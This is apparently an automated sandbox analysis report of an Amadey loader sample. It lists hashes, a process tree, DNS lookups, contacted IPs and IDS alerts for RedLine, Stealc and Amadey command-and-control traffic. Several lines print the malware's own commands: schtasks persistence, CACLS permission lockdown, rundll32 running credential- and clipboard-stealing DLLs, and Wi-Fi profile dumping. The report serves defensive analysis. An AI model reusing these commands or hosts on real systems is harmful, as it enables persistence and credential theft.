Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Nov. 3, 2023, 6:09 p.m.	Nov. 3, 2023, 6:15 p.m.

Size	306.5KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`5d0310efbb0ea7ead8624b0335b21b7b`
SHA256	`a43f3cf974c02ae797b15d908b0ce1253781e9523a3a5831c199cb4d5dcbda4a`
CRC32	`0E9B07EA`
ssdeep	`6144:Rb6w2ysktItqrvJ8oGJJWfZRXIjqGlG4u67+lAOHziULb:RNtmqjJ8xJmRGltu67sfL`
PDB Path	D:\Mktmp\Amadey\Release\Amadey.pdb
Yara	Malicious_Library_Zero - Malicious_Library UPX_Zero - UPX packed file Malicious_Packer_Zero - Malicious Packer PE_Header_Zero - PE File Signature IsPE32 - (no description) OS_Processor_Check_Zero - OS Processor Check

Amadey.exe "C:\Users\test22\AppData\Local\Temp\Amadey.exe"
2560
- Utsysc.exe "C:\Users\test22\AppData\Local\Temp\e8b5234212\Utsysc.exe"
  2680
  - schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\e8b5234212\Utsysc.exe" /F
    2772
  - cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "Utsysc.exe" /P "test22:N"&&CACLS "Utsysc.exe" /P "test22:R" /E&&echo Y|CACLS "..\e8b5234212" /P "test22:N"&&CACLS "..\e8b5234212" /P "test22:R" /E&&Exit
    2836
    - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
      2912
    - cacls.exe CACLS "Utsysc.exe" /P "test22:N"
      2952
    - cacls.exe CACLS "Utsysc.exe" /P "test22:R" /E
      3004
    - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
      3052
    - cacls.exe CACLS "..\e8b5234212" /P "test22:N"
      604
    - cacls.exe CACLS "..\e8b5234212" /P "test22:R" /E
      2124
  - 1.exe "C:\Users\test22\AppData\Local\Temp\1000006001\1.exe"
    2200
  - rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\aca439ae61e801\cred64.dll, Main
    2472
    - rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\aca439ae61e801\cred64.dll, Main
      2512
      - netsh.exe netsh wlan show profiles
        2620
  - rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\aca439ae61e801\clip64.dll, Main
    2592
  - abd.exe "C:\Users\test22\AppData\Local\Temp\1000008001\abd.exe"
    2752
    - Utsysc.exe "C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe"
      1080
      - schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe" /F
        2416
      - cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "Utsysc.exe" /P "test22:N"&&CACLS "Utsysc.exe" /P "test22:R" /E&&echo Y|CACLS "..\ea7c8244c8" /P "test22:N"&&CACLS "..\ea7c8244c8" /P "test22:R" /E&&Exit
        2636
        
        cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        1656
        
        cacls.exe CACLS "Utsysc.exe" /P "test22:N"
        560
        
        cacls.exe CACLS "Utsysc.exe" /P "test22:R" /E
        2884
        
        cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        1780
        
        cacls.exe CACLS "..\ea7c8244c8" /P "test22:N"
        3036
        
        cacls.exe CACLS "..\ea7c8244c8" /P "test22:R" /E
        1120
      - haloup.exe "C:\Users\test22\AppData\Local\Temp\1000080001\haloup.exe"
        2136
      - rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\465dbc52837d81\cred64.dll, Main
        2876
        
        rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\465dbc52837d81\cred64.dll, Main
        916
        
        netsh.exe netsh wlan show profiles
        2564
      - rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\465dbc52837d81\clip64.dll, Main
        2388
      - amers.exe "C:\Users\test22\AppData\Local\Temp\1000081001\amers.exe"
        3016
  - trafico.exe "C:\Users\test22\AppData\Local\Temp\1000009001\trafico.exe"
    1996
  - TEST32.exe "C:\Users\test22\AppData\Local\Temp\1000020001\TEST32.exe"
    1520
  - build2.exe "C:\Users\test22\AppData\Local\Temp\1000024001\build2.exe"
    1456
  - TEST32.exe "C:\Users\test22\AppData\Local\Temp\1000027001\TEST32.exe"
    1792
  - lom30.exe "C:\Users\test22\AppData\Local\Temp\1000029001\lom30.exe"
    3376
    - ZC1Hg57.exe C:\Users\test22\AppData\Local\Temp\IXP000.TMP\ZC1Hg57.exe
      3420
      - BD4sp82.exe C:\Users\test22\AppData\Local\Temp\IXP001.TMP\BD4sp82.exe
        3488
        
        kG1Do08.exe C:\Users\test22\AppData\Local\Temp\IXP002.TMP\kG1Do08.exe
        3532
        
        dw4YC64.exe C:\Users\test22\AppData\Local\Temp\IXP003.TMP\dw4YC64.exe
        3576
        
        yR0Hb97.exe C:\Users\test22\AppData\Local\Temp\IXP004.TMP\yR0Hb97.exe
        3620
        
        1TO62yp3.exe C:\Users\test22\AppData\Local\Temp\IXP005.TMP\1TO62yp3.exe
        3664
        
        AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        3708
        
        2jX0103.exe C:\Users\test22\AppData\Local\Temp\IXP005.TMP\2jX0103.exe
        3768
        
        AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        3856
        
        3mI23vW.exe C:\Users\test22\AppData\Local\Temp\IXP004.TMP\3mI23vW.exe
        4000
        
        4ec216QK.exe C:\Users\test22\AppData\Local\Temp\IXP003.TMP\4ec216QK.exe
        4092
        
        AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        3124
        
        5Az4sH9.exe C:\Users\test22\AppData\Local\Temp\IXP002.TMP\5Az4sH9.exe
        3136
        
        explothe.exe "C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe"
        3264
        
        schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
        1108
        
        cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "test22:N"&&CACLS "explothe.exe" /P "test22:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "test22:N"&&CACLS "..\fefffe8cea" /P "test22:R" /E&&Exit
        3280
        
        cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        3392
        
        cacls.exe CACLS "explothe.exe" /P "test22:N"
        3728
        
        cacls.exe CACLS "explothe.exe" /P "test22:R" /E
        3624
        
        cacls.exe CACLS "..\fefffe8cea" /P "test22:N"
        2304
        
        cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        4060
        
        cacls.exe CACLS "..\fefffe8cea" /P "test22:R" /E
        3536
      - 6Ye1nZ1.exe C:\Users\test22\AppData\Local\Temp\IXP001.TMP\6Ye1nZ1.exe
        300
    - 7wT5Ey89.exe C:\Users\test22\AppData\Local\Temp\IXP000.TMP\7wT5Ey89.exe
      3432
      - cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\EDD5.tmp\EDF6.tmp\EDF7.bat C:\Users\test22\AppData\Local\Temp\IXP000.TMP\7wT5Ey89.exe"
        2964
        
        iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome
        3544
        
        iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:3544 CREDAT:145409
        552
        
        iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:3544 CREDAT:79875
        1772
        
        iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:3544 CREDAT:145411
        948
explorer.exe C:\Windows\Explorer.EXE
1452

Name	Response	Post-Analysis Lookup
accounts.google.com	A 142.250.206.205	142.250.206.205
steamcommunity.com	A 104.76.78.101	104.76.78.101
fonts.gstatic.com	A 142.250.207.99	142.250.207.99
twitter.com	A 104.244.42.129	104.244.42.65
static-assets-prod.unrealengine.com	CNAME d1z9autcf703pk.cloudfront.net A 18.64.8.109 A 18.64.8.108 A 18.64.8.66 A 18.64.8.127	18.64.8.108
ssl.gstatic.com	A 142.250.207.99	142.250.207.99
www.google.com	A 142.250.76.132	142.250.76.132
api.ipify.org	A 173.231.16.77 A 64.185.227.156 CNAME api4.ipify.org A 104.237.62.212	173.231.16.77
fonts.googleapis.com	A 142.251.222.42	142.251.222.42
www.youtube.com	CNAME youtube-ui.l.google.com A 142.250.207.46 A 142.250.196.110 A 142.250.196.142 A 172.217.161.78 A 142.251.222.14 A 142.251.42.142 A 142.251.42.174 A 142.251.42.206 A 142.251.222.46 A 172.217.26.238 A 142.250.198.14 A 142.250.199.110 A 172.217.31.174 A 172.217.161.46 A 142.250.207.14 A 172.217.175.238	172.217.175.238
www.epicgames.com	CNAME epicgames.com A 54.175.89.124 A 3.227.131.25 A 34.194.132.179 A 34.206.130.105 A 52.204.190.22 A 52.0.122.33 A 184.73.58.32 A 72.44.55.16	34.198.71.3
www.paypal.com	CNAME www.glb.paypal.com CNAME cs1150.wpc.betacdn.net A 192.229.232.89	151.101.193.21
store.steampowered.com	A 23.40.44.77	23.40.44.77
community.cloudflare.steamstatic.com	A 172.64.145.151 A 104.18.42.105	172.64.145.151

IP Address	Status	Action
104.244.42.129	Active	Moloch
104.76.78.101	Active	Moloch
109.107.182.2	Active	Moloch
142.250.206.205	Active	Moloch
142.250.207.46	Active	Moloch
142.250.207.99	Active	Moloch
142.250.76.132	Active	Moloch
142.251.222.42	Active	Moloch
167.235.20.126	Active	Moloch
149.40.62.171	Active	Moloch
164.124.101.2	Active	Moloch
171.22.28.213	Active	Moloch
171.22.28.239	Active	Moloch
172.64.145.151	Active	Moloch
18.64.8.109	Active	Moloch
185.196.8.176	Active	Moloch
185.196.9.171	Active	Moloch
192.229.232.89	Active	Moloch
193.233.255.73	Active	Moloch
194.169.175.118	Active	Moloch
194.169.175.235	Active	Moloch
23.40.44.77	Active	Moloch
5.182.86.30	Active	Moloch
54.175.89.124	Active	Moloch
64.185.227.156	Active	Moloch
77.91.124.1	Active	Moloch
77.91.124.86	Active	Moloch
85.209.176.171	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49178 -> 194.169.175.235:42691	2043233	ET INFO Microsoft net.tcp Connection Initialization Activity	Potentially Bad Traffic
TCP 192.168.56.101:49178 -> 194.169.175.235:42691	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49178 -> 194.169.175.235:42691	2046045	ET MALWARE [ANY.RUN] RedLine Stealer Related (MC-NMF Authorization)	A Network Trojan was detected
TCP 194.169.175.235:42691 -> 192.168.56.101:49178	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	A Network Trojan was detected
TCP 192.168.56.101:49178 -> 194.169.175.235:42691	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49178 -> 194.169.175.235:42691	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 194.169.175.235:42691 -> 192.168.56.101:49178	2046056	ET MALWARE Redline Stealer Activity (Response)	A Network Trojan was detected
TCP 192.168.56.101:49178 -> 194.169.175.235:42691	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49178 -> 194.169.175.235:42691	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49178 -> 194.169.175.235:42691	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49178 -> 194.169.175.235:42691	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49178 -> 194.169.175.235:42691	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49178 -> 194.169.175.235:42691	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49174 -> 171.22.28.213:80	2018581	ET MALWARE Single char EXE direct download likely trojan (multiple families)	A Network Trojan was detected
TCP 192.168.56.101:49174 -> 171.22.28.213:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 171.22.28.213:80 -> 192.168.56.101:49174	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 171.22.28.213:80 -> 192.168.56.101:49174	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 171.22.28.213:80 -> 192.168.56.101:49174	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.101:49191 -> 194.169.175.118:80	2017598	ET MALWARE Possible Kelihos.F EXE Download Common Structure	A Network Trojan was detected
TCP 192.168.56.101:49191 -> 194.169.175.118:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 194.169.175.118:80 -> 192.168.56.101:49191	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 194.169.175.118:80 -> 192.168.56.101:49191	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 194.169.175.118:80 -> 192.168.56.101:49191	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.101:49187 -> 185.196.9.171:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49187 -> 185.196.9.171:80	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	Potentially Bad Traffic
TCP 185.196.9.171:80 -> 192.168.56.101:49187	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 185.196.9.171:80 -> 192.168.56.101:49187	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 185.196.9.171:80 -> 192.168.56.101:49187	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.101:49201 -> 185.196.9.171:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49204 -> 171.22.28.239:42359	2043233	ET INFO Microsoft net.tcp Connection Initialization Activity	Potentially Bad Traffic
TCP 185.196.9.171:80 -> 192.168.56.101:49201	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 185.196.9.171:80 -> 192.168.56.101:49201	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 185.196.9.171:80 -> 192.168.56.101:49201	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.101:49204 -> 171.22.28.239:42359	2046045	ET MALWARE [ANY.RUN] RedLine Stealer Related (MC-NMF Authorization)	A Network Trojan was detected
TCP 192.168.56.101:49204 -> 171.22.28.239:42359	2046105	ET MALWARE Redline Stealer TCP CnC Activity - MSValue (Outbound)	A Network Trojan was detected
TCP 192.168.56.101:49204 -> 171.22.28.239:42359	2046105	ET MALWARE Redline Stealer TCP CnC Activity - MSValue (Outbound)	A Network Trojan was detected
TCP 171.22.28.239:42359 -> 192.168.56.101:49204	2046056	ET MALWARE Redline Stealer Activity (Response)	A Network Trojan was detected
TCP 192.168.56.101:49201 -> 185.196.9.171:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49205 -> 5.182.86.30:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 185.196.9.171:80 -> 192.168.56.101:49201	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 185.196.9.171:80 -> 192.168.56.101:49201	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.101:49199 -> 185.196.8.176:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 5.182.86.30:80 -> 192.168.56.101:49205	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 5.182.86.30:80 -> 192.168.56.101:49205	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 5.182.86.30:80 -> 192.168.56.101:49205	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.101:49172 -> 167.235.20.126:80	2044597	ET MALWARE Amadey Bot Activity (POST) M1	A Network Trojan was detected
TCP 192.168.56.101:49177 -> 167.235.20.126:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.101:49177 -> 167.235.20.126:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 167.235.20.126:80 -> 192.168.56.101:49177	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 167.235.20.126:80 -> 192.168.56.101:49177	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 192.168.56.101:49209 -> 171.22.28.213:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 171.22.28.213:80 -> 192.168.56.101:49209	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 171.22.28.213:80 -> 192.168.56.101:49209	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 171.22.28.213:80 -> 192.168.56.101:49209	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.101:49215 -> 64.185.227.156:443	2047703	ET INFO External IP Address Lookup Domain (ipify .org) in TLS SNI	Misc activity
TCP 192.168.56.101:49215 -> 64.185.227.156:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49215 -> 64.185.227.156:443	2047703	ET INFO External IP Address Lookup Domain (ipify .org) in TLS SNI	Misc activity
TCP 192.168.56.101:49177 -> 167.235.20.126:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 192.168.56.101:49209 -> 171.22.28.213:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 171.22.28.213:80 -> 192.168.56.101:49209	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 171.22.28.213:80 -> 192.168.56.101:49209	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.101:49177 -> 167.235.20.126:80	2044623	ET MALWARE Amadey Bot Activity (POST)	A Network Trojan was detected
TCP 192.168.56.101:49177 -> 167.235.20.126:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
UDP 192.168.56.101:59002 -> 8.8.8.8:53	2047702	ET INFO External IP Lookup Domain (ipify .org) in DNS Lookup	Misc activity
TCP 192.168.56.101:49212 -> 64.185.227.156:443	2047703	ET INFO External IP Address Lookup Domain (ipify .org) in TLS SNI	Misc activity
TCP 192.168.56.101:49212 -> 64.185.227.156:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49212 -> 64.185.227.156:443	2047703	ET INFO External IP Address Lookup Domain (ipify .org) in TLS SNI	Misc activity
TCP 192.168.56.101:49199 -> 185.196.8.176:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 192.168.56.101:49225 -> 109.107.182.2:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 185.196.8.176:80 -> 192.168.56.101:49199	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 185.196.8.176:80 -> 192.168.56.101:49199	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 192.168.56.101:49226 -> 64.185.227.156:443	2047703	ET INFO External IP Address Lookup Domain (ipify .org) in TLS SNI	Misc activity
TCP 192.168.56.101:49226 -> 64.185.227.156:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49226 -> 64.185.227.156:443	2047703	ET INFO External IP Address Lookup Domain (ipify .org) in TLS SNI	Misc activity
TCP 185.196.8.176:80 -> 192.168.56.101:49199	2015744	ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging)	Misc activity
TCP 192.168.56.101:49224 -> 64.185.227.156:443	2047703	ET INFO External IP Address Lookup Domain (ipify .org) in TLS SNI	Misc activity
TCP 192.168.56.101:49224 -> 64.185.227.156:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49224 -> 64.185.227.156:443	2047703	ET INFO External IP Address Lookup Domain (ipify .org) in TLS SNI	Misc activity
TCP 109.107.182.2:80 -> 192.168.56.101:49225	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 109.107.182.2:80 -> 192.168.56.101:49225	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 109.107.182.2:80 -> 192.168.56.101:49225	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.101:49178 -> 194.169.175.235:42691	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49178 -> 194.169.175.235:42691	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49178 -> 194.169.175.235:42691	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49178 -> 194.169.175.235:42691	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49178 -> 194.169.175.235:42691	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49178 -> 194.169.175.235:42691	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49178 -> 194.169.175.235:42691	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49178 -> 194.169.175.235:42691	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49178 -> 194.169.175.235:42691	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49178 -> 194.169.175.235:42691	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49178 -> 194.169.175.235:42691	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49178 -> 194.169.175.235:42691	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49199 -> 185.196.8.176:80	2044623	ET MALWARE Amadey Bot Activity (POST)	A Network Trojan was detected
TCP 192.168.56.101:49276 -> 23.40.44.77:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49286 -> 104.76.78.101:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49295 -> 54.175.89.124:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49288 -> 104.244.42.129:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49301 -> 172.64.145.151:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49300 -> 172.64.145.151:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49305 -> 172.64.145.151:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49306 -> 172.64.145.151:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49308 -> 172.64.145.151:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49309 -> 172.64.145.151:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49310 -> 18.64.8.109:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49251 -> 193.233.255.73:80	2047625	ET MALWARE [ANY.RUN] Win32/Stealc Checkin (POST)	A Network Trojan was detected
TCP 192.168.56.101:49251 -> 193.233.255.73:80	2018358	ET HUNTING GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1	Potentially Bad Traffic
TCP 192.168.56.101:49257 -> 77.91.124.1:80	2027700	ET MALWARE Amadey CnC Check-In	Malware Command and Control Activity Detected
TCP 192.168.56.101:49257 -> 77.91.124.1:80	2045751	ET MALWARE Win32/Amadey Bot Activity (POST) M2	A Network Trojan was detected
TCP 192.168.56.101:49285 -> 104.76.78.101:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49289 -> 104.244.42.129:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49291 -> 104.244.42.129:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49290 -> 104.244.42.129:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49304 -> 172.64.145.151:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49317 -> 192.229.232.89:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49315 -> 192.229.232.89:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49319 -> 172.64.145.151:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.229.232.89:443 -> 192.168.56.101:49322	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.101:49307 -> 172.64.145.151:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49327 -> 172.64.145.151:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49320 -> 172.64.145.151:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49318 -> 192.229.232.89:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49321 -> 172.64.145.151:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49338 -> 142.250.207.46:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49339 -> 142.250.207.46:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49341 -> 142.250.206.205:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49347 -> 142.250.207.99:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49349 -> 142.250.207.99:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 23.40.44.77:443 -> 192.168.56.101:49279	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.101:49280 -> 23.40.44.77:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49275 -> 142.250.206.205:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49292 -> 104.244.42.129:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49299 -> 172.64.145.151:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49312 -> 18.64.8.109:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
